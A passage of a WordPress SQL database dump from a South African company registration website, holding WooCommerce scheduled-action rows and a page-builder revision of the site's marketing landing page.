05:42:20','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4fabbbca72e9.70130840-Si6R20UH928z0zfSjtCdGU987TwmLrjh','','','2019-08-11 07:46:35','2019-08-11 05:46:35','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32574',0,'scheduled-action','',3),(32575,0,'2019-08-11 05:42:20','2019-08-11 05:42:20','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4fabbc2daa47.79293200-Wy0NdCesF5JxmpbqTJ7m5QQCDzo7K6Ua','','','2019-08-11 07:46:36','2019-08-11 05:46:36','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32575',0,'scheduled-action','',3),(32576,0,'2019-08-11 06:46:36','2019-08-11 06:46:36','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4fba28cc1ac9.19861219-vh2zQL9v8rPnhCY4stCDt4n5MRssLgO9','','','2019-08-11 08:48:08','2019-08-11 06:48:08','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32576',0,'scheduled-action','',3),(32577,0,'2019-08-11 06:46:36','2019-08-11 06:46:36','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4fba28f33963.67125490-hEUgvWa4ba7gQNwr5y63FFDEVVhtwE0m','','','2019-08-11 08:48:08','2019-08-11 06:48:08','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32577',0,'scheduled-action','',3),(32578,0,'2019-08-11 07:48:08','2019-08-11 07:48:08','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4fc8de9052a3.55260249-gmx1qOBt1Rf9hXhWlcfwlbjtcfxBC4Ev','','','2019-08-11 09:50:54','2019-08-11 07:50:54','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32578',0,'scheduled-action','',3),(32579,0,'2019-08-11 07:48:09','2019-08-11 07:48:09','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4fc8deb691a8.37981908-RGdfdXJdR27M7Jl7eGtEYysqRMRBFHoI','','','2019-08-11 09:50:54','2019-08-11 07:50:54','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32579',0,'scheduled-action','',3),(32580,0,'2019-08-11 08:50:54','2019-08-11 08:50:54','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4fd9dd1386f4.21743097-D4b9YUgYfYNG0RB6JTRg0p5qds2TAJqx','','','2019-08-11 11:03:25','2019-08-11 09:03:25','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32580',0,'scheduled-action','',3),(32581,0,'2019-08-11 08:50:54','2019-08-11 08:50:54','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4fd9dd1e0ba1.17546612-d0m8adhl5vP9yzXaMSgqFkvfvBzcFpem','','','2019-08-11 11:03:25','2019-08-11 09:03:25','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32581',0,'scheduled-action','',3),(32465,3,'2019-08-08 16:38:54','2019-08-08 14:38:54','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"60px\" padding_1_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" admin_label=\"Header\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"60px\" parallax__hover=\"off\" parallax_method__hover=\"on\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|phone\"]<h1>Where would you like to go first</h1>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.26.6\" custom_padding=\"29.6875px|0px|0|0px|false|false\" column_structure=\"1_2,1_2\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.26.6\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color_gradient_start__hover=\"rgba(216,216,216,0)\" background_color_gradient_end__hover=\"rgba(190,196,195,0)\" use_background_color_gradient__hover=\"off\"][et_pb_cta title=\"Company Registration\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_letter_spacing=\"2px\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Maintaining Your Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" custom_padding=\"29.6875px|0px|0|0px|false|false\" column_structure=\"1_2,1_2\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Vat Registration\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Business Tools\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 16:38:54','2019-08-08 14:38:54','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32582,0,'2019-08-11 10:03:25','2019-08-11 10:03:25','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4feaa661c3c9.56162127-I83Kw9tUhfEZzalqBF33qido3LfZZ5lc','','','2019-08-11 12:15:02','2019-08-11 10:15:02','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32582',0,'scheduled-action','',3),(32583,0,'2019-08-11 10:03:25','2019-08-11 10:03:25','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4feaa685cc00.97072005-IiS457iKSMxyxP0p2JJZIujncNDQBxb6','','','2019-08-11 12:15:02','2019-08-11 10:15:02','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32583',0,'scheduled-action','',3),(32584,0,'2019-08-11 11:15:02','2019-08-11 11:15:02','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d50058f57cf29.53412927-vi28mx9EBkuYPqruqjaLxO3FsSlyN7A3','','','2019-08-11 14:09:51','2019-08-11 12:09:51','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32584',0,'scheduled-action','',3),(32585,0,'2019-08-11 11:15:02','2019-08-11 11:15:02','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d50058f7e0580.04703476-4yka3DMQ5fIhlqMDbzTo3ZROUaf4Zx1D','','','2019-08-11 14:09:51','2019-08-11 12:09:51','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32585',0,'scheduled-action','',3),(32586,0,'2019-08-11 13:09:51','2019-08-11 13:09:51','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d501787d4a474.71544951-9OTIHwx3pRdN6WojigTnlMMAsw8X559g','','','2019-08-11 15:26:31','2019-08-11 13:26:31','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32586',0,'scheduled-action','',3),(32587,0,'2019-08-11 13:09:51','2019-08-11 13:09:51','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d501788092703.99504972-YHjOTpAeNMvafQD8QSv844I1wtdszKwe','','','2019-08-11 15:26:32','2019-08-11 13:26:32','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32587',0,'scheduled-action','',3),(32588,0,'2019-08-11 14:26:31','2019-08-11 14:26:31','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d50263baeddd3.98531739-EjwNyUAbXRKTQoOAN9gXWjpPPERsDoPD','','','2019-08-11 16:29:15','2019-08-11 14:29:15','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32588',0,'scheduled-action','',3),(32589,0,'2019-08-11 14:26:32','2019-08-11 14:26:32','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d50263bc7a5d9.10658235-n50YvXe5GhN3IlaDRUWSohLq33rtLenL','','','2019-08-11 16:29:15','2019-08-11 14:29:15','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32589',0,'scheduled-action','',3),(32590,0,'2019-08-11 15:29:15','2019-08-11 15:29:15','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5034e3a2b954.56084791-9f5fclOxLHinYx098eMfZEL2oLVNrhNa','','','2019-08-11 17:31:47','2019-08-11 15:31:47','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32590',0,'scheduled-action','',3),(32591,0,'2019-08-11 15:29:15','2019-08-11 15:29:15','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5034e3d2c5d3.27720015-pzAIqYrInK5ufjL3bHlUW0g8rTTFPbiy','','','2019-08-11 17:31:47','2019-08-11 15:31:47','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32591',0,'scheduled-action','',3),(32592,0,'2019-08-11 16:31:47','2019-08-11 16:31:47','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d504643696a48.11916174-5Klr160dLYWxrdvZ03b2v97GYXWA1ekP','','','2019-08-11 18:45:55','2019-08-11 